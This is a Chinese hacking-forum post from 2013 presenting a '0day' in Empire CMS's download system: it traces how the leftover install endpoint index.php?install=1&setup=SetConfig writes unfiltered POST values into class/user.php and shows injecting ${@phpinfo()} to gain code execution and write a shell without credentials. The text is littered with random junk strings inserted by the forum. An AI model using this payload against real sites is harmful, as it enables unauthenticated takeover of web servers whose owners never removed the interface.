中国网络渗透测试联盟

标题: 帝国万能接口漏洞0day [打印本页]

作者: admin 时间: 2013-1-23 09:34
标题: 帝国万能接口漏洞0day
这是帝国的一套下载系统如图 ps(不需要任何账户和密码，直接写shell) 由于很多站是由于下载要整合discuz等等一些论坛.... 而帝国他又有一个万能接口，如图而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码当我们
. c% @. Z" S* K
2 R% x9 G' G, K4 c, n
6 k9 a+ l3 k$ V
这是帝国的一套下载系统如图1 ]1 b2 L. o4 O+ ~2 J& m- D
ps(不需要任何账户和密码，直接写shell)
  s  N3 a3 M$ |. I" E5 V
由于很多站是由于下载要整合discuz 等等一些论坛....
, P9 Y/ Y- B' a, v9 ?3 g

! J; h- z0 U" _. c) X+ Q8 F# j
而帝国他又有一个万能接口，如图
7 J# o& Z, C1 R4 b9 n
[attach]170[/attach]8 d! t  t; v5 U2 t
3 n- S5 `) E; B& ?4 X6 r6 x+ F, x: u
而这个接口很多人又不会删除，由此他带来了很大的安全隐患，导致直接getshell，下面分析代码2 z  H1 {' {+ B6 E8 `4 X, H' l3 k
. O8 r1 N0 s3 {- X% P3 t
当我们提交的时候，他地址是提交到index.php?install=1&setup=SetConfig
1. if($_GET['install']==1)
2. {
3. @include("../class/connect.php");
4. @include("../class/db_sql.php");
5. @include("../class/functions.php");
6. $link=db_connect();
7. $empire=new mysqlquery();
8. if($setup=="SetConfig")
9. {
10. SetUserCOMConfig($_POST);
11. }
12. elseif($setup=="alter")
13. {
14. InstallUserCOM();
15. }
16. elseif($setup=="update")
17. {
18. UpdateUserCOM();
19. }
20. else
21. {}
复制代码
他这里开始调用一个SetUserCOMConfig的函数了，我们继续跟踪
9 l$ C5 @- j' @0 h0 }3 N1 F9 G3 r1 D
在data/fun.php中的15行  l+ y* k% c2 _( g' y( p* U
# v  B+ z( c* s1 R. F; R
我们可以看到这个函数
1. function SetUserCOMConfig($add){
2. $filetext=ReadFiletext('data/user.php');
3. if(empty($filetext))
4. {
5. InstallShowMsg('文件 /update/data/user.php 丢失,安装不成功.');
6. }
7. $vr=explode(",",ReturnRepUserVar());
8. $count=count($vr);
9. for($i=0;$i<$count;$i++)
10. {
11. $filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);
12. }
13. //写入配置文件
14. $fp=@fopen("../class/user.php","w");
15. if(!$fp)
16. {
1 J! P2 C! W9 E/ l
17. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
18. }
19. @fputs($fp,$filetext);
20. @fclose($fp);
复制代码
.....//省略若干# o5 x1 _& \4 b7 ]
! H2 D. }  \  m& ^# S
这里的他将$filetext=str_replace("[!@--".$vr[$i]."--@!]",$add[$vr[$i]],$filetext);$ P4 T& O: S9 h7 Z" ]' H

$ ^& @( J2 R1 N! F5 p他将传进来的变量进行了切割，然后赋给了$filetext8 m5 k& }3 T; f2 i! N7 M2 h2 W

: |, v1 F# z6 s1 F$ }, v; p然后看下面
1. //写入配置文件
2. $fp=@fopen("../class/user.php","w");
3. if(!$fp)
4. {
5. InstallShowMsg(' /class/user.php 文件权限没有设为0777，安装不成功.');
6. }
7. @fputs($fp,$filetext);
复制代码
打开了一个class/user.php文件，然后将$filetext写入了2 J+ r" P( I  W5 i: w3 D) ~

' |& |* m: j2 e5 E# N0 A' ^' i我们看看写入的结果，随便填一个

6 L6 }) J1 }/ j  d[attach]171[/attach]
, Y/ a, I8 A9 _9 D! u, [
' ~. L. G: t' `5 o: m6 \3 q5 ^4 D% R" x+ ^. w; p1 }2 ]
[attach]172[/attach]0 u& ^& |, ^4 i, N* d" Z6 a

0 D$ K" N, u% U$ p) O
) h# L5 i3 h/ u2 N% g2 x& m0 i3 S0 p  r  Z( C! v
, {, W% H  J' R' l8 e

& v) j/ }" W: Y. m- E
8 h! x% C- Y2 l7 T# s; k" K2 `3 s0 F7 `% J. J) z& o
, X6 T/ q& j. k+ Y8 j' O

9 P: r4 R' j9 B4 v$ n! z[attach]173[/attach]3 R1 U* Z- @- e

" P+ f. U* h2 T+ H
' Y1 l1 t& N& B2 M2 e1 u  v2 u6 y/ q& l6 V6 p
( Q% O) Q3 y6 I0 `4 Q1 t, \9 t

6 b% v# h& J+ p9 R9 e+ Y[attach]174[/attach]
6 k' s; u$ o9 u, a/ ^' C3 l( R+ V  }: W5 R, G
所以我们淫荡点，写个${@phpinfo()}试试
3 b8 v6 f+ k& S! e# k) c+ \

然后访问以下class/user.php这个文件
" _% q% J+ e1 H- ^# \日了吧

; {; Z2 ~: t# c5 k6 k( ~; c
6 t: ?. \4 A! l9 b8 C8 ^7 `7 g  j' v; F2 k& X) p7 u3 b

0 m0 u8 O  G4 }4 W0 r' W0 M; p% k3 E$ L$ w/ x& B

欢迎光临中国网络渗透测试联盟 (https://www.cobjon.com/)